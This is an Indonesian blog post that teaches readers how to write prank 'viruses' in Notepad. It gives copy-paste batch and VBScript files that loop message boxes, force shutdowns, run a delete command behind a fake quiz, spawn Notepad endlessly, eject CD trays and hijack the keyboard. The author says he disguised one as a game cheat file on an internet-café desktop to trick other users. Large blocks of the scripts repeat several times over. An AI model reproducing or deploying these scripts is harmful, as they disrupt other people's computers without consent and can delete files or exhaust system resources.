Cara membuat virus dengan notepad

Ya, kali ini saya akan memberikan artikel mengenai cara pembuatan virus dengan notepad.
Mungkin ini adalah kebalikan dari artikel saya yang sebelumnya yaitu Antivirus gratis terbaik 2013.


Saya membuat judul virus karena program ini adalah program yang mungkin agak merugikan bagi 'sebagian' orang.

Sebenarnya ini adalah virus tapi tujuan program ini untuk menjahili orang lain.
Saya coba tes sendiri di Warnet dan work (jangan ditiru ya)
Kalau mau tes di kompi sendiri boleh. (kalau greget)

ya ini dia contohnya :

Dibawah ada beberapa script kode untuk membuat virus silahkan diubah atau langsung dikopi ke notepad anda.
1.Virus dengan sasaran buat orang jengkel karena muncul terus, sebenarnya bukan virus tapi hanya program yang sok-sok jadi virus :)
@ECHO off
:
Begin
msg * Haloo ?
msg * Lagi apa nih ?
msg * Weww ketahuan nih..
msg * Hayooo ngaku..
msg * Ye ye ketauan yeye ketahuan
msg * Aku matiin saja gimana
msg * Mau……………………….
GOTO BEGIN
simpan dengan berekstensi .bat contoh Usil.bat
2.Membuat Virus Wants to Be A Milionaire
@echo off
title quiz wants to be a millionaire
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. Matikan Komputer
echo 2. Format Komputer
echo 3. Yahhhh…
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * Kurang Beruntung nih
msg * Kurang Iman kali :D
msg * Aduh ini gimana kok tambah parah
msg * Masukin ke UGD aja ya
msg * Telpon 311 saja ya
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
Simpan dengan .bat contoh contoh = Kuis Wants to be a millionaire.bat
3. Membuka notepad terus-menerus
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
Simpan dengan ektensi.bat
4. Shutdown sendiri dan kirim pesan otomatis
Set wshShell
=wscript.CreateObject
(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Simpan dengan .vbs
5.CD Room terbuka dan tertutup terus
Set oWMP = CreateObject
(“WMPlayer.OCX.7″)
Set colCDROMs =
oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Simpan dengan .vbs
- See more at: http://www.blog.renggagumilar.com/eksperimen-membuat-virus-sederhana-menggunakan-notepad/#sthash.VKgLuGQf.dpuf

1. Cara bikin Virus Message Dengan Notepat
@ECHO off
:Begin
msg * Jontor Virus Beraksi
msg * Muka lo jelek - ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
save namafile.BAT (ekstensi filenya harus .BAT) Simpan dalam notepad.
ket : ini yang saya pakai di warnet. saya ganti namanya jadi cheatpb.bat trus saya copy di desktop.
virus ini akan memunculkan pesan yang ditulis.
2. Cara membuat shutdown+message
Code:
[i]@echo off
msg * apaan sih lo
shutdown -s -c “Error! muka mu standar abis”
save namafile.BAT (ekstensi filenya harus .BAT) Simpan dalam notepad.
3. Cara Mainin Caps Lock button
Code:
[i]Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
save namafile.vbs[/i] (save dengan Ekstensi file .vbs) simpan dalam notepat.

4. Cara buka tutup CD/DVD
[i]Code:
Set oWMP = CreateObject(“WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
save namafile.vbs[/i] (save dengan Ekstensi file .vbs) simpan dalam notepat.
5. Cara bikin vbscript nongol mlulu
Code:
[i]Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
save namafile.vbs ket:di task manager full wscript yg lg running [/i]
6. Cara bikin teken tombol backspace melulu
Code:
[i]MsgBox “kembali ke menu sebelumnya”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
save namafile.vbs [/i] simpan di dalam notepat
7. Cara bikin otomatis ngetik “lu jelek banget sih” di notepad/word
Code:
[i]Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “lu jelek banget sih!!!”
loop
save namafile.vbs simpan di dalam notepat
8. Cara bikin buka notepad trus menerus 
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
save namafile.BAT
ket:termasuk yang ngeselin banget nih
bisa di ganti,terserah mau buka cmd ato buka yg lain..ganti aja dir nya.
[/i]

semua itu bisa diubah sendiri sesuai kemauan.
----
Tutorial ubah ekstensi jadi .BAT / .VBS
pada saat di notepad, buka menu file, save as, ubah save as type menjadi all files, dan ganti filename. ingat, setelah menulis filename, dibelakangnya jangan lupa diberi ".bat" atau ".vbs" tergantung jenis virus (tanpa tanda ")
----
Boleh buat iseng tapi jangan keterlaluan ya.

----------
Kunjungi artikel saya yang lain :
TuneUP Utilities
Antivirus Gratis Terbaik 2013

----------
 Keywords
- Virus
- antivirus
- cara
- bikin
- membuat
- notepad 
Dibawah ada beberapa script kode untuk membuat virus silahkan diubah atau langsung dikopi ke notepad anda.
1.Virus dengan sasaran buat orang jengkel karena muncul terus, sebenarnya bukan virus tapi hanya program yang sok-sok jadi virus :)
@ECHO off
:
Begin
msg * Haloo ?
msg * Lagi apa nih ?
msg * Weww ketahuan nih..
msg * Hayooo ngaku..
msg * Ye ye ketauan yeye ketahuan
msg * Aku matiin saja gimana
msg * Mau……………………….
GOTO BEGIN
simpan dengan berekstensi .bat contoh Usil.bat
2.Membuat Virus Wants to Be A Milionaire
@echo off
title quiz wants to be a millionaire
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. Matikan Komputer
echo 2. Format Komputer
echo 3. Yahhhh…
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * Kurang Beruntung nih
msg * Kurang Iman kali :D
msg * Aduh ini gimana kok tambah parah
msg * Masukin ke UGD aja ya
msg * Telpon 311 saja ya
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
Simpan dengan .bat contoh contoh = Kuis Wants to be a millionaire.bat
3. Membuka notepad terus-menerus
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
Simpan dengan ektensi.bat
4. Shutdown sendiri dan kirim pesan otomatis
Set wshShell
=wscript.CreateObject
(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Simpan dengan .vbs
5.CD Room terbuka dan tertutup terus
Set oWMP = CreateObject
(“WMPlayer.OCX.7″)
Set colCDROMs =
oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Simpan dengan .vbs
- See more at: http://www.blog.renggagumilar.com/eksperimen-membuat-virus-sederhana-menggunakan-notepad/#sthash.VKgLuGQf.dpuf
Dibawah ada beberapa script kode untuk membuat virus silahkan diubah atau langsung dikopi ke notepad anda.
1.Virus dengan sasaran buat orang jengkel karena muncul terus, sebenarnya bukan virus tapi hanya program yang sok-sok jadi virus :)
@ECHO off
:
Begin
msg * Haloo ?
msg * Lagi apa nih ?
msg * Weww ketahuan nih..
msg * Hayooo ngaku..
msg * Ye ye ketauan yeye ketahuan
msg * Aku matiin saja gimana
msg * Mau……………………….
GOTO BEGIN
simpan dengan berekstensi .bat contoh Usil.bat
2.Membuat Virus Wants to Be A Milionaire
@echo off
title quiz wants to be a millionaire
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. Matikan Komputer
echo 2. Format Komputer
echo 3. Yahhhh…
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * Kurang Beruntung nih
msg * Kurang Iman kali :D
msg * Aduh ini gimana kok tambah parah
msg * Masukin ke UGD aja ya
msg * Telpon 311 saja ya
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
Simpan dengan .bat contoh contoh = Kuis Wants to be a millionaire.bat
3. Membuka notepad terus-menerus
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
Simpan dengan ektensi.bat
4. Shutdown sendiri dan kirim pesan otomatis
Set wshShell
=wscript.CreateObject
(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Simpan dengan .vbs
5.CD Room terbuka dan tertutup terus
Set oWMP = CreateObject
(“WMPlayer.OCX.7″)
Set colCDROMs =
oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Simpan dengan .vbs
- See more at: http://www.blog.renggagumilar.com/eksperimen-membuat-virus-sederhana-menggunakan-notepad/#sthash.VKgLuGQf.dpuf
Dibawah ada beberapa script kode untuk membuat virus silahkan diubah atau langsung dikopi ke notepad anda.
1.Virus dengan sasaran buat orang jengkel karena muncul terus, sebenarnya bukan virus tapi hanya program yang sok-sok jadi virus :)
@ECHO off
:
Begin
msg * Haloo ?
msg * Lagi apa nih ?
msg * Weww ketahuan nih..
msg * Hayooo ngaku..
msg * Ye ye ketauan yeye ketahuan
msg * Aku matiin saja gimana
msg * Mau……………………….
GOTO BEGIN
simpan dengan berekstensi .bat contoh Usil.bat
2.Membuat Virus Wants to Be A Milionaire
@echo off
title quiz wants to be a millionaire
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. Matikan Komputer
echo 2. Format Komputer
echo 3. Yahhhh…
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * Kurang Beruntung nih
msg * Kurang Iman kali :D
msg * Aduh ini gimana kok tambah parah
msg * Masukin ke UGD aja ya
msg * Telpon 311 saja ya
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
Simpan dengan .bat contoh contoh = Kuis Wants to be a millionaire.bat
3. Membuka notepad terus-menerus
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
Simpan dengan ektensi.bat
4. Shutdown sendiri dan kirim pesan otomatis
Set wshShell
=wscript.CreateObject
(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Simpan dengan .vbs
5.CD Room terbuka dan tertutup terus
Set oWMP = CreateObject
(“WMPlayer.OCX.7″)
Set colCDROMs =
oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Simpan dengan .vbs
- See more at: http://www.blog.renggagumilar.com/eksperimen-membuat-virus-sederhana-menggunakan-notepad/#sthash.VKgLuGQf.dpuf
Dibawah ada beberapa script kode untuk membuat virus silahkan diubah atau langsung dikopi ke notepad anda.
1.Virus dengan sasaran buat orang jengkel karena muncul terus, sebenarnya bukan virus tapi hanya program yang sok-sok jadi virus :)
@ECHO off
:
Begin
msg * Haloo ?
msg * Lagi apa nih ?
msg * Weww ketahuan nih..
msg * Hayooo ngaku..
msg * Ye ye ketauan yeye ketahuan
msg * Aku matiin saja gimana
msg * Mau……………………….
GOTO BEGIN
simpan dengan berekstensi .bat contoh Usil.bat
2.Membuat Virus Wants to Be A Milionaire
@echo off
title quiz wants to be a millionaire
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. Matikan Komputer
echo 2. Format Komputer
echo 3. Yahhhh…
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * Kurang Beruntung nih
msg * Kurang Iman kali :D
msg * Aduh ini gimana kok tambah parah
msg * Masukin ke UGD aja ya
msg * Telpon 311 saja ya
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
Simpan dengan .bat contoh contoh = Kuis Wants to be a millionaire.bat
3. Membuka notepad terus-menerus
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
Simpan dengan ektensi.bat
4. Shutdown sendiri dan kirim pesan otomatis
Set wshShell
=wscript.CreateObject
(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Simpan dengan .vbs
5.CD Room terbuka dan tertutup terus
Set oWMP = CreateObject
(“WMPlayer.OCX.7″)
Set colCDROMs =
oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Simpan dengan .vbs
- See more at: http://www.blog.renggagumilar.com/eksperimen-membuat-virus-sederhana-menggunakan-notepad/#sthash.VKgLuGQf.dpuf

1 komentar:

  1. Kalau gitu bisa ngamuk komputer orang yang diisengin. Bisa bisa dibanting deh komputernya. Hehe...

    BalasHapus

No Junk, No Sara, No Rasis. Jangan memakai kata kasar dalam berkomentar. dilarang promosi.